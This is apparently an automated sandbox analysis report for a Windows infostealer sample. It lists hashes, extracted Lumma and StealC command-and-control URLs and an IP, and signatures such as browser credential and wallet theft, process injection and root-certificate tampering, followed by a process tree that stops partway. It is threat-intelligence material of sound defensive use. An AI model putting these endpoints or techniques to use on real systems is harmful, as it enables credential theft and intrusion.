Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2024 10:23
Static task
static1
Behavioral task
behavioral1
Sample
2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe
-
Size
7.5MB
-
MD5
ef73612f46c61d7042f63d9818879d0f
-
SHA1
0801aac8254f2ec234f4fb6e181d60ae39fd1021
-
SHA256
b59de93972a43adb45d38fb3df5cf87735dccaac41a351cdfc09e3660642486c
-
SHA512
30ff2583a13103bf00e412dd543181fe709eea2037cbd385fae2096962e43406264491302e1f37b7a4a74c3739436046201f0a3162fa3c502305869f47b7bb9d
-
SSDEEP
98304:oNF2OZV+MaTsEPLMmRwjNn/Wi9l5VrAZrwE3Io:onV+MW+NPzrA9
Malware Config
Extracted
lumma
https://drawwyobstacw.sbs
https://condifendteu.sbs
https://ehticsprocw.sbs
https://vennurviot.sbs
https://resinedyw.sbs
https://enlargkiw.sbs
https://allocatinow.sbs
https://mathcucom.sbs
Extracted
stealc
mainteam
http://95.182.96.50
-
url_path
/2aced82320799c96.php
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 79 3724 powershell.exe 82 3724 powershell.exe 85 3724 powershell.exe -
pid Process 3724 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 4520 1.exe 3224 2.exe 4544 3.exe -
Loads dropped DLL 2 IoCs
pid Process 4804 BitLockerToGo.exe 4804 BitLockerToGo.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 81 ip-api.com -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4520 set thread context of 2820 4520 1.exe 96 PID 3224 set thread context of 4804 3224 2.exe 105 PID 4544 set thread context of 4964 4544 3.exe 110 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\launcher289\1.exe 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe File created C:\Program Files\launcher289\2.exe 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe File created C:\Program Files\launcher289\3.exe 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe -
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language whoami.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BitLockerToGo.exe -
GoLang User-Agent 8 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 25 Go-http-client/1.1 HTTP User-Agent header 26 Go-http-client/1.1 HTTP User-Agent header 29 Go-http-client/1.1 HTTP User-Agent header 52 Go-http-client/1.1 HTTP User-Agent header 77 Go-http-client/1.1 HTTP User-Agent header 18 Go-http-client/1.1 HTTP User-Agent header 23 Go-http-client/1.1 HTTP User-Agent header 24 Go-http-client/1.1 -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1136 powershell.exe 1136 powershell.exe 4804 BitLockerToGo.exe 4804 BitLockerToGo.exe 4804 BitLockerToGo.exe 4804 BitLockerToGo.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe 3724 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1136 powershell.exe Token: SeIncreaseQuotaPrivilege 3492 wmic.exe Token: SeSecurityPrivilege 3492 wmic.exe Token: SeTakeOwnershipPrivilege 3492 wmic.exe Token: SeLoadDriverPrivilege 3492 wmic.exe Token: SeSystemProfilePrivilege 3492 wmic.exe Token: SeSystemtimePrivilege 3492 wmic.exe Token: SeProfSingleProcessPrivilege 3492 wmic.exe Token: SeIncBasePriorityPrivilege 3492 wmic.exe Token: SeCreatePagefilePrivilege 3492 wmic.exe Token: SeBackupPrivilege 3492 wmic.exe Token: SeRestorePrivilege 3492 wmic.exe Token: SeShutdownPrivilege 3492 wmic.exe Token: SeDebugPrivilege 3492 wmic.exe Token: SeSystemEnvironmentPrivilege 3492 wmic.exe Token: SeRemoteShutdownPrivilege 3492 wmic.exe Token: SeUndockPrivilege 3492 wmic.exe Token: SeManageVolumePrivilege 3492 wmic.exe Token: 33 3492 wmic.exe Token: 34 3492 wmic.exe Token: 35 3492 wmic.exe Token: 36 3492 wmic.exe Token: SeIncreaseQuotaPrivilege 3492 wmic.exe Token: SeSecurityPrivilege 3492 wmic.exe Token: SeTakeOwnershipPrivilege 3492 wmic.exe Token: SeLoadDriverPrivilege 3492 wmic.exe Token: SeSystemProfilePrivilege 3492 wmic.exe Token: SeSystemtimePrivilege 3492 wmic.exe Token: SeProfSingleProcessPrivilege 3492 wmic.exe Token: SeIncBasePriorityPrivilege 3492 wmic.exe Token: SeCreatePagefilePrivilege 3492 wmic.exe Token: SeBackupPrivilege 3492 wmic.exe Token: SeRestorePrivilege 3492 wmic.exe Token: SeShutdownPrivilege 3492 wmic.exe Token: SeDebugPrivilege 3492 wmic.exe Token: SeSystemEnvironmentPrivilege 3492 wmic.exe Token: SeRemoteShutdownPrivilege 3492 wmic.exe Token: SeUndockPrivilege 3492 wmic.exe Token: SeManageVolumePrivilege 3492 wmic.exe Token: 33 3492 wmic.exe Token: 34 3492 wmic.exe Token: 35 3492 wmic.exe Token: 36 3492 wmic.exe Token: SeIncreaseQuotaPrivilege 3596 wmic.exe Token: SeSecurityPrivilege 3596 wmic.exe Token: SeTakeOwnershipPrivilege 3596 wmic.exe Token: SeLoadDriverPrivilege 3596 wmic.exe Token: SeSystemProfilePrivilege 3596 wmic.exe Token: SeSystemtimePrivilege 3596 wmic.exe Token: SeProfSingleProcessPrivilege 3596 wmic.exe Token: SeIncBasePriorityPrivilege 3596 wmic.exe Token: SeCreatePagefilePrivilege 3596 wmic.exe Token: SeBackupPrivilege 3596 wmic.exe Token: SeRestorePrivilege 3596 wmic.exe Token: SeShutdownPrivilege 3596 wmic.exe Token: SeDebugPrivilege 3596 wmic.exe Token: SeSystemEnvironmentPrivilege 3596 wmic.exe Token: SeRemoteShutdownPrivilege 3596 wmic.exe Token: SeUndockPrivilege 3596 wmic.exe Token: SeManageVolumePrivilege 3596 wmic.exe Token: 33 3596 wmic.exe Token: 34 3596 wmic.exe Token: 35 3596 wmic.exe Token: 36 3596 wmic.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 1504 wrote to memory of 1136 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 86 PID 1504 wrote to memory of 1136 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 86 PID 1504 wrote to memory of 3492 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 89 PID 1504 wrote to memory of 3492 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 89 PID 1504 wrote to memory of 4520 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 91 PID 1504 wrote to memory of 4520 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 91 PID 1504 wrote to memory of 4520 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 91 PID 1504 wrote to memory of 3596 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 92 PID 1504 wrote to memory of 3596 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 92 PID 1504 wrote to memory of 4340 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 94 PID 1504 wrote to memory of 4340 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 94 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 1504 wrote to memory of 3224 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 97 PID 1504 wrote to memory of 3224 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 97 PID 1504 wrote to memory of 3224 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 97 PID 1504 wrote to memory of 1476 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 98 PID 1504 wrote to memory of 1476 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 98 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 4520 wrote to memory of 2820 4520 1.exe 96 PID 1504 wrote to memory of 380 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 103 PID 1504 wrote to memory of 380 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 103 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 3224 wrote to memory of 4804 3224 2.exe 105 PID 1504 wrote to memory of 4544 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 107 PID 1504 wrote to memory of 4544 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 107 PID 1504 wrote to memory of 4544 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 107 PID 1504 wrote to memory of 3636 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 108 PID 1504 wrote to memory of 3636 1504 2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe 108 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4544 wrote to memory of 4964 4544 3.exe 110 PID 4964 wrote to memory of 3724 4964 BitLockerToGo.exe 111 PID 4964 wrote to memory of 3724 4964 BitLockerToGo.exe 111 PID 4964 wrote to memory of 3724 4964 BitLockerToGo.exe 111 PID 4964 wrote to memory of 4860 4964 BitLockerToGo.exe 113 PID 4964 wrote to memory of 4860 4964 BitLockerToGo.exe 113 PID 4964 wrote to memory of 4860 4964 BitLockerToGo.exe 113 PID 3724 wrote to memory of 3596 3724 powershell.exe 116 PID 3724 wrote to memory of 3596 3724 powershell.exe 116 PID 3724 wrote to memory of 3596 3724 powershell.exe 116
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-10_ef73612f46c61d7042f63d9818879d0f_poet-rat_snatch.exe"1⤵
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Program Files\launcher289\1.exe"C:\Program Files\launcher289\1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get name2⤵PID:4340
-
-
C:\Program Files\launcher289\2.exe"C:\Program Files\launcher289\2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
